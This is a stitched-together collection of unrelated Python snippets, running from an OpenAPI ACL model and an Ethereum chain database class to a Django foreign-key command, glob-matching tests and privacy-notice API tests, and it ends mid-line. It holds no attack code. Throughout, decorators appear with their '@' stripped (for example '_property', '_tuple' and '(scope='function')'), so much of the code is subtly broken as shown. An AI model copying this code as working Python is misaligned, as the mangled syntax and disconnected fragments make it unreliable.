class BulkUpdateAclEntry(ModelComposed): allowed_values = {('negated',): {'disable': 0, 'enable': 1}, ('op',): {'CREATE': 'create', 'UPDATE': 'update', 'DELETE': 'delete'}} validations = {} _property def additional_properties_type(): lazy_import() return (bool, date, datetime, dict, float, int, list, str, none_type) _nullable = False _property def openapi_types(): lazy_import() return {'negated': (int,), 'comment': (str, none_type), 'ip': (str,), 'subnet': (int, none_type), 'op': (str,), 'id': (str,)} _property def discriminator(): return None attribute_map = {'negated': 'negated', 'comment': 'comment', 'ip': 'ip', 'subnet': 'subnet', 'op': 'op', 'id': 'id'} read_only_vars = {'id'} _js_args_to_python_args def _from_openapi_data(cls, *args, **kwargs): _check_type = kwargs.pop('_check_type', True) _spec_property_naming = kwargs.pop('_spec_property_naming', False) _path_to_item = kwargs.pop('_path_to_item', ()) _configuration = kwargs.pop('_configuration', None) _visited_composed_classes = kwargs.pop('_visited_composed_classes', ()) self = super(OpenApiModel, cls).__new__(cls) if args: raise ApiTypeError(('Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments.' % (args, self.__class__.__name__)), path_to_item=_path_to_item, valid_classes=(self.__class__,)) self._data_store = {} self._check_type = _check_type self._spec_property_naming = _spec_property_naming self._path_to_item = _path_to_item self._configuration = _configuration self._visited_composed_classes = (_visited_composed_classes + (self.__class__,)) constant_args = {'_check_type': _check_type, '_path_to_item': _path_to_item, '_spec_property_naming': _spec_property_naming, '_configuration': _configuration, '_visited_composed_classes': self._visited_composed_classes} composed_info = validate_get_composed_info(constant_args, kwargs, self) self._composed_instances = composed_info[0] self._var_name_to_model_instances = composed_info[1] self._additional_properties_model_instances = composed_info[2] discarded_args = composed_info[3] for (var_name, var_value) in kwargs.items(): if ((var_name in discarded_args) and (self._configuration is not None) and self._configuration.discard_unknown_keys and self._additional_properties_model_instances): continue setattr(self, var_name, var_value) return self required_properties = set(['_data_store', '_check_type', '_spec_property_naming', '_path_to_item', '_configuration', '_visited_composed_classes', '_composed_instances', '_var_name_to_model_instances', '_additional_properties_model_instances']) _js_args_to_python_args def __init__(self, *args, **kwargs): _check_type = kwargs.pop('_check_type', True) _spec_property_naming = kwargs.pop('_spec_property_naming', False) _path_to_item = kwargs.pop('_path_to_item', ()) _configuration = kwargs.pop('_configuration', None) _visited_composed_classes = kwargs.pop('_visited_composed_classes', ()) if args: raise ApiTypeError(('Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments.' % (args, self.__class__.__name__)), path_to_item=_path_to_item, valid_classes=(self.__class__,)) self._data_store = {} self._check_type = _check_type self._spec_property_naming = _spec_property_naming self._path_to_item = _path_to_item self._configuration = _configuration self._visited_composed_classes = (_visited_composed_classes + (self.__class__,)) constant_args = {'_check_type': _check_type, '_path_to_item': _path_to_item, '_spec_property_naming': _spec_property_naming, '_configuration': _configuration, '_visited_composed_classes': self._visited_composed_classes} composed_info = validate_get_composed_info(constant_args, kwargs, self) self._composed_instances = composed_info[0] self._var_name_to_model_instances = composed_info[1] self._additional_properties_model_instances = composed_info[2] discarded_args = composed_info[3] for (var_name, var_value) in kwargs.items(): if ((var_name in discarded_args) and (self._configuration is not None) and self._configuration.discard_unknown_keys and self._additional_properties_model_instances): continue setattr(self, var_name, var_value) if (var_name in self.read_only_vars): raise ApiAttributeError(f'`{var_name}` is a read-only attribute. Use `from_openapi_data` to instantiate class with read only attributes.') _property def _composed_schemas(): lazy_import() return {'anyOf': [], 'allOf': [AclEntry, BulkUpdateAclEntryAllOf], 'oneOf': []}
def get_tuple_validator(subvalidator): def validator(value): if isinstance(value, (tuple, list)): value2 = tuple(value) elif isinstance(value, basestring): value2 = tuple([s.strip() for s in value.strip('()[]').split(',')]) else: raise ValueError(('Cannot make a tuple of %r' % value)) return tuple([subvalidator(x) for x in value2]) return validator
class ChainDB(HeaderDB, ChainDatabaseAPI): def __init__(self, db: AtomicDatabaseAPI) -> None: self.db = db def get_chain_gaps(self) -> ChainGaps: return self._get_chain_gaps(self.db) def _get_chain_gaps(cls, db: DatabaseAPI) -> ChainGaps: try: encoded_gaps = db[SchemaV1.make_chain_gaps_lookup_key()] except KeyError: return GENESIS_CHAIN_GAPS else: return rlp.decode(encoded_gaps, sedes=chain_gaps) def _update_chain_gaps(cls, db: DatabaseAPI, persisted_block: BlockAPI, base_gaps: ChainGaps=None) -> GapInfo: if (base_gaps is None): base_gaps = cls._get_chain_gaps(db) (gap_change, gaps) = fill_gap(persisted_block.number, base_gaps) if (gap_change is not GapChange.NoChange): db.set(SchemaV1.make_chain_gaps_lookup_key(), rlp.encode(gaps, sedes=chain_gaps)) return (gap_change, gaps) def _update_header_chain_gaps(cls, db: DatabaseAPI, persisting_header: BlockHeaderAPI, base_gaps: ChainGaps=None) -> GapInfo: (gap_change, gaps) = super()._update_header_chain_gaps(db, persisting_header, base_gaps) if ((gap_change is not GapChange.NoChange) or (persisting_header.block_number == 0)): return (gap_change, gaps) current_gaps = cls._get_chain_gaps(db) if (not is_block_number_in_gap(persisting_header.block_number, current_gaps)): old_canonical_header = cls._get_canonical_block_header_by_number(db, persisting_header.block_number) if (old_canonical_header != persisting_header): updated_gaps = reopen_gap(persisting_header.block_number, current_gaps) db.set(SchemaV1.make_chain_gaps_lookup_key(), rlp.encode(updated_gaps, sedes=chain_gaps)) return (gap_change, gaps) def get_block_uncles(self, uncles_hash: Hash32) -> Tuple[(BlockHeaderAPI, ...)]: validate_word(uncles_hash, title='Uncles Hash') if (uncles_hash == EMPTY_UNCLE_HASH): return () try: encoded_uncles = self.db[uncles_hash] except KeyError as exc: raise HeaderNotFound(f'No uncles found for hash {uncles_hash!r}') from exc else: return tuple(rlp.decode(encoded_uncles, sedes=rlp.sedes.CountableList(HeaderSedes))) def _decanonicalize_old_headers(cls, db: DatabaseAPI, numbers_to_decanonicalize: Sequence[BlockNumber]) -> Tuple[(BlockHeaderAPI, ...)]: old_canonical_headers = [] for block_number in numbers_to_decanonicalize: try: old_hash = cls._get_canonical_block_hash(db, block_number) except HeaderNotFound: break else: old_header = cls._get_block_header_by_hash(db, old_hash) old_canonical_headers.append(old_header) try: transaction_hashes = cls._get_block_transaction_hashes(db, old_header) for transaction_hash in transaction_hashes: cls._remove_transaction_from_canonical_chain(db, transaction_hash) except MissingTrieNode: pass return tuple(old_canonical_headers) def persist_block(self, block: BlockAPI, genesis_parent_hash: Hash32=GENESIS_PARENT_HASH) -> Tuple[(Tuple[(Hash32, ...)], Tuple[(Hash32, ...)])]: with self.db.atomic_batch() as db: return self._persist_block(db, block, genesis_parent_hash) def persist_unexecuted_block(self, block: BlockAPI, receipts: Tuple[(ReceiptAPI, ...)], genesis_parent_hash: Hash32=GENESIS_PARENT_HASH) -> Tuple[(Tuple[(Hash32, ...)], Tuple[(Hash32, ...)])]: (tx_root_hash, tx_kv_nodes) = make_trie_root_and_nodes(block.transactions) if (tx_root_hash != block.header.transaction_root): raise ValidationError(f"Block's transaction_root ({block.header.transaction_root!r}) does not match expected value: {tx_root_hash!r}") (receipt_root_hash, receipt_kv_nodes) = make_trie_root_and_nodes(receipts) if (receipt_root_hash != block.header.receipt_root): raise ValidationError(f"Block's receipt_root ({block.header.receipt_root!r}) does not match expected value: {receipt_root_hash!r}") with self.db.atomic_batch() as db: self._persist_trie_data_dict(db, receipt_kv_nodes) self._persist_trie_data_dict(db, tx_kv_nodes) return self._persist_block(db, block, genesis_parent_hash) def _persist_block(cls, db: DatabaseAPI, block: BlockAPI, genesis_parent_hash: Hash32) -> Tuple[(Tuple[(Hash32, ...)], Tuple[(Hash32, ...)])]: header_chain = (block.header,) (new_canonical_headers, old_canonical_headers) = cls._persist_header_chain(db, header_chain, genesis_parent_hash) for header in new_canonical_headers: if (header.hash == block.hash): tx_hashes = tuple((tx.hash for tx in block.transactions)) else: tx_hashes = cls._get_block_transaction_hashes(db, header) for (index, transaction_hash) in enumerate(tx_hashes): cls._add_transaction_to_canonical_chain(db, transaction_hash, header, index) if (hasattr(block, 'withdrawals') and (block.withdrawals not in (None, ()))): withdrawal_hashes = tuple((withdrawal.hash for withdrawal in block.withdrawals)) for (index, withdrawal_hash) in enumerate(withdrawal_hashes): cls._add_withdrawal_to_canonical_chain(db, withdrawal_hash, header, index) if block.uncles: uncles_hash = cls._persist_uncles(db, block.uncles) else: uncles_hash = EMPTY_UNCLE_HASH if (uncles_hash != block.header.uncles_hash): raise ValidationError("Block's uncles_hash (%s) does not match actual uncles' hash (%s)", block.header.uncles_hash, uncles_hash) new_canonical_hashes = tuple((header.hash for header in new_canonical_headers)) old_canonical_hashes = tuple((header.hash for header in old_canonical_headers)) cls._update_chain_gaps(db, block) return (new_canonical_hashes, old_canonical_hashes) def persist_uncles(self, uncles: Tuple[BlockHeaderAPI]) -> Hash32: return self._persist_uncles(self.db, uncles) def _persist_uncles(db: DatabaseAPI, uncles: Tuple[(BlockHeaderAPI, ...)]) -> Hash32: uncles_hash = keccak(rlp.encode(uncles)) db.set(uncles_hash, rlp.encode(uncles, sedes=rlp.sedes.CountableList(HeaderSedes))) return cast(Hash32, uncles_hash) def _get_block_data_from_root_hash(db: DatabaseAPI, block_root_hash: Hash32) -> Iterable[Hash32]: item_db = HexaryTrie(db, root_hash=block_root_hash) for item_idx in itertools.count(): item_key = rlp.encode(item_idx) encoded = item_db[item_key] if (encoded != b''): (yield encoded) else: break def add_receipt(self, block_header: BlockHeaderAPI, index_key: int, receipt: ReceiptAPI) -> Hash32: receipt_db = HexaryTrie(db=self.db, root_hash=block_header.receipt_root) receipt_db[index_key] = receipt.encode() return receipt_db.root_hash def add_transaction(self, block_header: BlockHeaderAPI, index_key: int, transaction: SignedTransactionAPI) -> Hash32: transaction_db = HexaryTrie(self.db, root_hash=block_header.transaction_root) transaction_db[index_key] = transaction.encode() return transaction_db.root_hash def get_block_transactions(self, header: BlockHeaderAPI, transaction_decoder: Type[TransactionDecoderAPI]) -> Tuple[(SignedTransactionAPI, ...)]: return self._get_block_transactions(header.transaction_root, transaction_decoder) def get_block_transaction_hashes(self, block_header: BlockHeaderAPI) -> Tuple[(Hash32, ...)]: return self._get_block_transaction_hashes(self.db, block_header) _tuple def _get_block_transaction_hashes(cls, db: DatabaseAPI, block_header: BlockHeaderAPI) -> Iterable[Hash32]: all_encoded_transactions = cls._get_block_data_from_root_hash(db, block_header.transaction_root) for encoded_transaction in all_encoded_transactions: (yield cast(Hash32, keccak(encoded_transaction))) _tuple def get_receipts(self, header: BlockHeaderAPI, receipt_decoder: Type[ReceiptDecoderAPI]) -> Iterable[ReceiptAPI]: receipt_db = HexaryTrie(db=self.db, root_hash=header.receipt_root) for receipt_idx in itertools.count(): receipt_key = rlp.encode(receipt_idx) receipt_data = receipt_db[receipt_key] if (receipt_data != b''): (yield receipt_decoder.decode(receipt_data)) else: break def get_transaction_by_index(self, block_number: BlockNumber, transaction_index: int, transaction_decoder: Type[TransactionDecoderAPI]) -> SignedTransactionAPI: try: block_header = self.get_canonical_block_header_by_number(block_number) except HeaderNotFound: raise TransactionNotFound(f'Block {block_number} is not in the canonical chain') transaction_db = HexaryTrie(self.db, root_hash=block_header.transaction_root) encoded_index = rlp.encode(transaction_index) encoded_transaction = transaction_db[encoded_index] if (encoded_transaction != b''): return transaction_decoder.decode(encoded_transaction) else: raise TransactionNotFound(f'No transaction is at index {transaction_index} of block {block_number}') def get_transaction_index(self, transaction_hash: Hash32) -> Tuple[(BlockNumber, int)]: key = SchemaV1.make_transaction_hash_to_block_lookup_key(transaction_hash) try: encoded_key = self.db[key] except KeyError: raise TransactionNotFound(f'Transaction {encode_hex(transaction_hash)} not found in canonical chain') transaction_key = rlp.decode(encoded_key, sedes=BlockDataKey) return (transaction_key.block_number, transaction_key.index) def get_receipt_by_index(self, block_number: BlockNumber, receipt_index: int, receipt_decoder: Type[ReceiptDecoderAPI]) -> ReceiptAPI: try: block_header = self.get_canonical_block_header_by_number(block_number) except HeaderNotFound: raise ReceiptNotFound(f'Block {block_number} is not in the canonical chain') receipt_db = HexaryTrie(db=self.db, root_hash=block_header.receipt_root) receipt_key = rlp.encode(receipt_index) receipt_data = receipt_db[receipt_key] if (receipt_data != b''): return receipt_decoder.decode(receipt_data) else: raise ReceiptNotFound(f'Receipt with index {receipt_index} not found in block') _cache(maxsize=32) _tuple def _get_block_transactions(self, transaction_root: Hash32, transaction_decoder: Type[TransactionDecoderAPI]) -> Iterable[SignedTransactionAPI]: for encoded_transaction in self._get_block_data_from_root_hash(self.db, transaction_root): (yield transaction_decoder.decode(encoded_transaction)) def _remove_transaction_from_canonical_chain(db: DatabaseAPI, transaction_hash: Hash32) -> None: db.delete(SchemaV1.make_transaction_hash_to_block_lookup_key(transaction_hash)) def _add_transaction_to_canonical_chain(db: DatabaseAPI, transaction_hash: Hash32, block_header: BlockHeaderAPI, index: int) -> None: transaction_key = BlockDataKey(block_header.block_number, index) db.set(SchemaV1.make_transaction_hash_to_block_lookup_key(transaction_hash), rlp.encode(transaction_key)) def get_block_withdrawals(self, header: BlockHeaderAPI) -> Tuple[(WithdrawalAPI, ...)]: return self._get_block_withdrawals(header.withdrawals_root) _cache(maxsize=32) _tuple def _get_block_withdrawals(self, withdrawals_root: Hash32) -> Iterable[WithdrawalAPI]: for encoded_withdrawal in self._get_block_data_from_root_hash(self.db, withdrawals_root): (yield rlp.decode(encoded_withdrawal, sedes=Withdrawal)) def _add_withdrawal_to_canonical_chain(db: DatabaseAPI, withdrawal_hash: Hash32, block_header: BlockHeaderAPI, index: int) -> None: withdrawal_key = BlockDataKey(block_header.block_number, index) db.set(SchemaV1.make_withdrawal_hash_to_block_lookup_key(withdrawal_hash), rlp.encode(withdrawal_key)) def exists(self, key: bytes) -> bool: return self.db.exists(key) def get(self, key: bytes) -> bytes: return self.db[key] def persist_trie_data_dict(self, trie_data_dict: Dict[(Hash32, bytes)]) -> None: with self.db.atomic_batch() as db: self._persist_trie_data_dict(db, trie_data_dict) def _persist_trie_data_dict(cls, db: DatabaseAPI, trie_data_dict: Dict[(Hash32, bytes)]) -> None: for (key, value) in trie_data_dict.items(): db[key] = value
.usefixtures('use_tmpdir') def test_forward_model_env_and_exec_env_is_set(): with open('exec', 'w', encoding='utf-8') as f: pass os.chmod('exec', ((stat.S_IXUSR | stat.S_IXGRP) | stat.S_IXOTH)) with open('CONFIG', 'w', encoding='utf-8') as f: f.write(dedent('\n EXECUTABLE exec\n ENV a b\n ENV c d\n EXEC_ENV a1 b1\n EXEC_ENV c1 d1\n ')) forward_model = ForwardModel.from_config_file('CONFIG') assert (forward_model.environment['a'] == 'b') assert (forward_model.environment['c'] == 'd') assert (forward_model.exec_env['a1'] == 'b1') assert (forward_model.exec_env['c1'] == 'd1')
def compile_valcode_to_evm_bytecode(valcode_type, address): valcodes = generate_all_valcodes(address) valcode = valcodes[valcode_type] if (type(valcode) is bytes): return valcode elif (type(valcode) is list): lll_node = LLLnode.from_list(valcode) optimized = optimizer.optimize(lll_node) assembly = compile_lll.compile_to_assembly(optimized) evm = compile_lll.assembly_to_evm(assembly) return evm else: raise ValueError('Valcode must be of types list (uncompiled LLL), or bytes (compiled bytecode). Given: {}'.format(type(valcode)))
def unsubscribe_all(date, cognito_id): print('unsubscribing user from all lists...') user = user_service.get_single_user(cognito_id) if user.subscriptions: for subscription in user.subscriptions: unsubscribe_single_list(date, cognito_id, asdict(subscription)) return
class OptionSeriesErrorbarSonificationDefaultinstrumentoptionsMappingHighpass(Options): def frequency(self) -> 'OptionSeriesErrorbarSonificationDefaultinstrumentoptionsMappingHighpassFrequency': return self._config_sub_data('frequency', OptionSeriesErrorbarSonificationDefaultinstrumentoptionsMappingHighpassFrequency) def resonance(self) -> 'OptionSeriesErrorbarSonificationDefaultinstrumentoptionsMappingHighpassResonance': return self._config_sub_data('resonance', OptionSeriesErrorbarSonificationDefaultinstrumentoptionsMappingHighpassResonance)
class Command(BaseCommand): def add_arguments(self, parser): parser.add_argument('--db_name') parser.add_argument('--db_user') parser.add_argument('--db_pass') def handle(self, *args, **options): self.IS_VERBOSE = False if (options['verbosity'] > 1): self.IS_VERBOSE = True if options['db_name']: db_name = options['db_name'] else: db_name = utils.get_env_setting('DB_NAME') if options['db_user']: db_user = options['db_user'] else: db_user = utils.get_env_setting('DB_USER') if options['db_pass']: db_pass = options['db_pass'] else: db_pass = utils.get_env_setting('DB_PASS') db_host = utils.get_env_setting('DB_HOST') self.conn = psycopg2.connect(database=db_name, user=db_user, password=db_pass, host=db_host) cursor = self.conn.cursor() self.create_foreign_keys(cursor) self.analyze_db(cursor) self.conn.commit() self.conn.close() def create_foreign_keys(self, cursor): if self.IS_VERBOSE: print('Adding foreign key references...') prefix = 'ALTER TABLE frontend_prescription ' prefix += 'ADD CONSTRAINT frontend_prescription' suffix = ' ON DELETE CASCADE' indexes = [{'fk': 'sha_id', 'table': 'frontend_sha', 'pk': 'code'}, {'fk': 'pct_id', 'table': 'frontend_pct', 'pk': 'code'}, {'fk': 'chemical_id', 'table': 'frontend_chemical', 'pk': 'bnf_code'}, {'fk': 'practice_id', 'table': 'frontend_practice', 'pk': 'code'}] for index in indexes: cmd = ('%s_%s_fkey ' % (prefix, index['fk'])) cmd += ('FOREIGN KEY (%s) ' % index['fk']) cmd += ('REFERENCES %s(%s) ' % (index['table'], index['pk'])) cmd += suffix self._print_and_execute(cursor, cmd) def analyze_db(self, cursor): if self.IS_VERBOSE: print('Analyzing database...') self._print_and_execute(cursor, 'ANALYZE VERBOSE') def _print_and_execute(self, cursor, cmd): if self.IS_VERBOSE: print(cmd) cursor.execute(cmd) self.conn.commit()
class TestPathlibMatch(TestPathlibGlobmatch): cases = [['match', 'some/path/to/match', True], ['to/match', 'some/path/to/match', True], ['path/to/match', 'some/path/to/match', True], ['some/**/match', 'some/path/to/match', False], ['some/**/match', 'some/path/to/match', True, pathlib.G]] def run(cls, path, pattern, flags, goal): assert (path.match(pattern, flags=flags) == goal), ('Expression did not evaluate as %s' % goal)
class _MonitorThread(threading.Thread): def __init__(self, runner: LocalRunner) -> None: super().__init__() self.runner = runner def run(self) -> None: if (self.runner._options.bootstrap_info is None): return while True: if (not self.runner._running): logger.debug(f'{self.runner._module}:monitor thread stopping') return try: if (self.runner._options.bootstrap_info.process_manager_state.get_overall().value >= ProcessPhase.STOPPING.value): logger.debug(f'{self.runner._module}:stopping due to graph shutdown') self.runner._running = False return except (EOFError, ConnectionError, OSError, BrokenPipeError): logger.warning(f'{self.runner._module}:lost process manager, stopping') self.runner._running = False time.sleep(0.1)
class TestPostPrivacyNotices(): (scope='function') def url(self) -> str: return (V1_URL_PREFIX + PRIVACY_NOTICE) (scope='function') def notice_request(self, load_default_data_uses) -> Dict[(str, Any)]: return {'name': 'test privacy notice 1', 'notice_key': 'test_privacy_notice_1', 'description': 'my test privacy notice', 'regions': [PrivacyNoticeRegion.be.value, PrivacyNoticeRegion.us_ca.value], 'consent_mechanism': ConsentMechanism.opt_in.value, 'data_uses': ['marketing.advertising'], 'enforcement_level': EnforcementLevel.system_wide.value, 'displayed_in_overlay': True} (scope='function') def notice_request_no_key(self, load_default_data_uses) -> Dict[(str, Any)]: return {'name': 'My Test Privacy Notice', 'description': 'my test privacy notice', 'regions': [PrivacyNoticeRegion.be.value, PrivacyNoticeRegion.us_ca.value], 'consent_mechanism': ConsentMechanism.opt_in.value, 'data_uses': ['marketing.advertising'], 'enforcement_level': EnforcementLevel.system_wide.value, 'displayed_in_overlay': True} (scope='function') def notice_request_2(self, load_default_data_uses) -> Dict[(str, Any)]: return {'name': 'test privacy notice 2', 'notice_key': 'test_privacy_notice_2', 'regions': [PrivacyNoticeRegion.us_ca.value], 'consent_mechanism': ConsentMechanism.opt_in.value, 'data_uses': ['personalize'], 'enforcement_level': EnforcementLevel.system_wide.value, 'displayed_in_overlay': True} def test_post_privacy_notice_unauthenticated(self, url, api_client): resp = api_client.post(url) assert (resp.status_code == 401) def test_post_privacy_notice_wrong_scope(self, url, api_client: TestClient, generate_auth_header): auth_header = generate_auth_header(scopes=[scopes.PRIVACY_NOTICE_READ]) resp = api_client.post(url, headers=auth_header) assert (resp.status_code == 403) def test_post_invalid_privacy_notice_missing_field(self, api_client: TestClient, generate_auth_header, url, notice_request: dict[(str, Any)], notice_request_2: dict[(str, Any)]): auth_header = generate_auth_header(scopes=[scopes.PRIVACY_NOTICE_CREATE]) notice_request_no_name: dict[(str, Any)] = notice_request.copy() notice_request_no_name.pop('name') resp = api_client.post(url, headers=auth_header, json=[notice_request_no_name]) assert (resp.status_code == 422) resp = api_client.post(url, headers=auth_header, json=[notice_request_no_name, notice_request_2]) assert (resp.status_code == 422) def test_post_invalid_privacy_notice_includes_id(self, api_client: TestClient, generate_auth_header, url, notice_request: dict[(str, Any)], notice_request_2: dict[(str, Any)]): auth_header = generate_auth_header(scopes=[scopes.PRIVACY_NOTICE_CREATE]) notice_request_with_id: dict[(str, Any)] = notice_request.copy() notice_request_with_id['id'] = 'pn_1' resp = api_client.post(url, headers=auth_header, json=[notice_request_with_id]) assert (resp.status_code == 422) def test_post_invalid_privacy_notice_invalid_values(self, api_client: TestClient, generate_auth_header, url, notice_request: dict[(str, Any)]): auth_header = generate_auth_header(scopes=[scopes.PRIVACY_NOTICE_CREATE]) notice_request_bad_region: dict[(str, Any)] = notice_request.copy() notice_request_bad_region['regions'] = [] resp = api_client.post(url, headers=auth_header, json=[notice_request_bad_region]) assert (resp.status_code == 422) notice_request_bad_region['regions'] = ['invalid_region'] resp = api_client.post(url, headers=auth_header, json=[notice_request_bad_region]) assert (resp.status_code == 422) notice_request_bad_region['regions'] = [PrivacyNoticeRegion.be.value, 'invalid_region'] resp = api_client.post(url, headers=auth_header, json=[notice_request_bad_region]) assert (resp.status_code == 422) notice_request_bad_region.pop('regions') resp = api_client.post(url, headers=auth_header, json=[notice_request_bad_region]) assert (resp.status_code == 422) notice_request_bad_data_uses: dict[(str, Any)] = notice_request.copy() notice_request_bad_data_uses['data_uses'] = [] resp = api_client.post(url, headers=auth_header, json=[notice_request_bad_data_uses]) assert (resp.status_code == 422) notice_request_bad_data_uses['data_uses'] = ['invalid_data_use'] resp = api_client.post(url, headers=auth_header, json=[notice_request_bad_data_uses]) assert (resp.status_code == 422) notice_request_bad_data_uses['data_uses'] = ['marketing.advertising', 'invalid_data_use'] resp = api_client.post(url, headers=auth_header, json=[notice_request_bad_data_uses]) assert (resp.status_code == 422) notice_request_bad_data_uses.pop('data_uses') resp = api_client.post(url, headers=auth_header, json=[notice_request_bad_data_uses]) assert (resp.status_code == 422) notice_request_bad_cm: dict[(str, Any)] = notice_request.copy() notice_request_bad_cm['consent_mechanism'] = ['invalid_mechanism'] resp = api_client.post(url, headers=auth_header, json=[notice_request_bad_cm]) assert (resp.status_code == 422) notice_request_bad_el: dict[(str, Any)] = notice_request.copy() notice_request_bad_el['enforcement_level'] = ['invalid'] resp = api_client.post(url, headers=auth_header, json=[notice_request_bad_el]) assert (resp.status_code == 422) def test_post_invalid_privacy_notice_data_use_conflicts_within_request(self, api_client: TestClient, generate_auth_header, url, notice_request: dict[(str, Any)]): auth_header = generate_auth_header(scopes=[scopes.PRIVACY_NOTICE_CREATE]) notice_request_identical_use = notice_request.copy() notice_request_identical_use['name'] = 'different notice name' notice_request_identical_use['regions'] = [PrivacyNoticeRegion.be.value] resp = api_client.post(url, headers=auth_header, json=[notice_request, notice_request_identical_use]) assert (resp.status_code == 422) notice_request_child_use = notice_request.copy() notice_request_child_use['name'] = 'different notice name' notice_request_child_use['region'] = [PrivacyNoticeRegion.be.value] notice_request_child_use['data_use'] = ['marketing.advertising.first_party'] resp = api_client.post(url, headers=auth_header, json=[notice_request, notice_request_child_use]) assert (resp.status_code == 422) def test_post_invalid_privacy_notice_data_use_conflicts_with_existing_notice(self, api_client: TestClient, generate_auth_header, url, privacy_notice: PrivacyNotice, privacy_notice_us_co_third_party_sharing: PrivacyNotice, notice_request: dict[(str, Any)], db): auth_header = generate_auth_header(scopes=[scopes.PRIVACY_NOTICE_CREATE]) resp = api_client.post(url, headers=auth_header, json=[notice_request]) assert (resp.status_code == 422) notice_request_updated_data_use = notice_request.copy() notice_request_updated_data_use['data_uses'] = ['marketing.advertising.first_party', 'third_party_sharing'] resp = api_client.post(url, headers=auth_header, json=[notice_request_updated_data_use]) assert (resp.status_code == 422) privacy_notice.update(db, data={'disabled': True}) resp = api_client.post(url, headers=auth_header, json=[notice_request_updated_data_use]) assert (resp.status_code == 200) def test_post_privacy_notice_opt_in_must_be_displayed_in_overlay(self, api_client: TestClient, generate_auth_header, notice_request: dict[(str, Any)], url): assert (notice_request['consent_mechanism'] == ConsentMechanism.opt_in.value) notice_request['displayed_in_overlay'] = False auth_header = generate_auth_header(scopes=[scopes.PRIVACY_NOTICE_CREATE]) resp = api_client.post(url, headers=auth_header, json=[notice_request]) assert (resp.status_code == 422) assert (resp.json()['detail'][0]['msg'] == 'Opt-in notices must be served in an overlay.') def test_post_privacy_notice_opt_out_must_be_displayed_in_overlay_or_privacy_center(self, api_client: TestClient, generate_auth_header, notice_request: dict[(str, Any)], url): notice_request['consent_mechanism'] = ConsentMechanism.opt_out.value notice_request['displayed_in_overlay'] = False notice_request['displayed_in_privacy_center'] = False auth_header = generate_auth_header(scopes=[scopes.PRIVACY_NOTICE_CREATE]) resp = api_client.post(url, headers=auth_header, json=[notice_request]) assert (resp.status_code == 422) assert (resp.json()['detail'][0]['msg'] == 'Opt-out notices must be served in an overlay or the privacy center.') def test_post_privacy_notice_notice_only_must_be_displayed_in_overlay(self, api_client: TestClient, generate_auth_header, notice_request: dict[(str, Any)], url): notice_request['consent_mechanism'] = ConsentMechanism.notice_only.value notice_request['displayed_in_overlay'] = False notice_request['displayed_in_privacy_center'] = False auth_header = generate_auth_header(scopes=[scopes.PRIVACY_NOTICE_CREATE]) resp = api_client.post(url, headers=auth_header, json=[notice_request]) assert (resp.status_code == 422) assert (resp.json()['detail'][0]['msg'] == 'Notice-only notices must be served in an overlay.') def test_post_privacy_notice_bad_notice_key(self, api_client: TestClient, generate_auth_header, notice_request: dict[(str, Any)], url): notice_request['notice_key'] = "My Notice's Key" auth_header = generate_auth_header(scopes=[scopes.PRIVACY_NOTICE_CREATE]) resp = api_client.post(url, headers=auth_header, json=[notice_request]) assert (resp.status_code == 422) assert ('FidesKeys must only contain alphanumeric characters' in resp.json()['detail'][0]['msg']) def test_post_privacy_notice(self, api_client: TestClient, generate_auth_header, notice_request: dict[(str, Any)], url, db): auth_header = generate_auth_header(scopes=[scopes.PRIVACY_NOTICE_CREATE]) before_creation = datetime.now().isoformat() (overlay_exp, privacy_center_exp) = PrivacyExperience.get_overlay_and_privacy_center_experience_by_region(db, PrivacyNoticeRegion.be) assert (overlay_exp is None) assert (privacy_center_exp is None) (ca_overlay_exp, ca_privacy_center_exp) = PrivacyExperience.get_overlay_and_privacy_center_experience_by_region(db, PrivacyNoticeRegion.us_ca) assert (ca_overlay_exp is None) assert (ca_privacy_center_exp is None) resp = api_client.post(url, headers=auth_header, json=[notice_request]) assert (resp.status_code == 200) assert (len(resp.json()) == 1) response_notice = resp.json()[0] assert (response_notice['name'] == notice_request['name']) assert ('id' in response_notice) assert (response_notice['version'] == 1.0) assert (response_notice['created_at'] < datetime.now().isoformat()) assert (response_notice['created_at'] > before_creation) assert (response_notice['updated_at'] < datetime.now().isoformat()) assert (response_notice['updated_at'] > before_creation) assert (not response_notice['disabled']) db_notice: PrivacyNotice = PrivacyNotice.get(db=db, object_id=response_notice['id']) assert (response_notice['name'] == db_notice.name) assert (response_notice['version'] == db_notice.version) assert (response_notice['created_at'] == db_notice.created_at.isoformat()) assert (response_notice['updated_at'] == db_notice.updated_at.isoformat()) assert (response_notice['disabled'] == db_notice.disabled) (overlay_exp, privacy_center_exp) = PrivacyExperience.get_overlay_and_privacy_center_experience_by_region(db, PrivacyNoticeRegion.be) assert (overlay_exp is not None) assert (overlay_exp.experience_config_id is not None) overlay_copy = overlay_exp.experience_config assert (overlay_copy.component == ComponentType.overlay) assert overlay_copy.is_default assert (privacy_center_exp is None) (ca_overlay_exp, ca_privacy_center_exp) = PrivacyExperience.get_overlay_and_privacy_center_experience_by_region(db, PrivacyNoticeRegion.us_ca) overlay_exp.delete(db) ca_overlay_exp.delete(db) def test_post_privacy_notice_no_notice_key(self, api_client: TestClient, generate_auth_header, notice_request_no_key: dict[(str, Any)], url, db): auth_header = generate_auth_header(scopes=[scopes.PRIVACY_NOTICE_CREATE]) before_creation = datetime.now().isoformat() (overlay_exp, privacy_center_exp) = PrivacyExperience.get_overlay_and_privacy_center_experience_by_region(db, PrivacyNoticeRegion.be) assert (overlay_exp is None) assert (privacy_center_exp is None) (ca_overlay_exp, ca_privacy_center_exp) = PrivacyExperience.get_overlay_and_privacy_center_experience_by_region(db, PrivacyNoticeRegion.us_ca) assert (ca_overlay_exp is None) assert (ca_privacy_center_exp is None) resp = api_client.post(url, headers=auth_header, json=[notice_request_no_key]) assert (resp.status_code == 200) assert (len(resp.json()) == 1) response_notice = resp.json()[0] assert (response_notice['name'] == notice_request_no_key['name']) assert ('id' in response_notice) assert (response_notice['version'] == 1.0) assert (response_notice['created_at'] < datetime.now().isoformat()) assert (response_notice['created_at'] > before_creation) assert (response_notice['updated_at'] < datetime.now().isoformat()) assert (response_notice['updated_at'] > before_creation) assert (response_notice['notice_key'] == 'my_test_privacy_notice') assert (not response_notice['disabled']) db_notice: PrivacyNotice = PrivacyNotice.get(db=db, object_id=response_notice['id']) assert (response_notice['name'] == db_notice.name) assert (response_notice['version'] == db_notice.version) assert (response_notice['created_at'] == db_notice.created_at.isoformat()) assert (response_notice['updated_at'] == db_notice.updated_at.isoformat()) assert (response_notice['disabled'] == db_notice.disabled) assert (response_notice['notice_key'] == 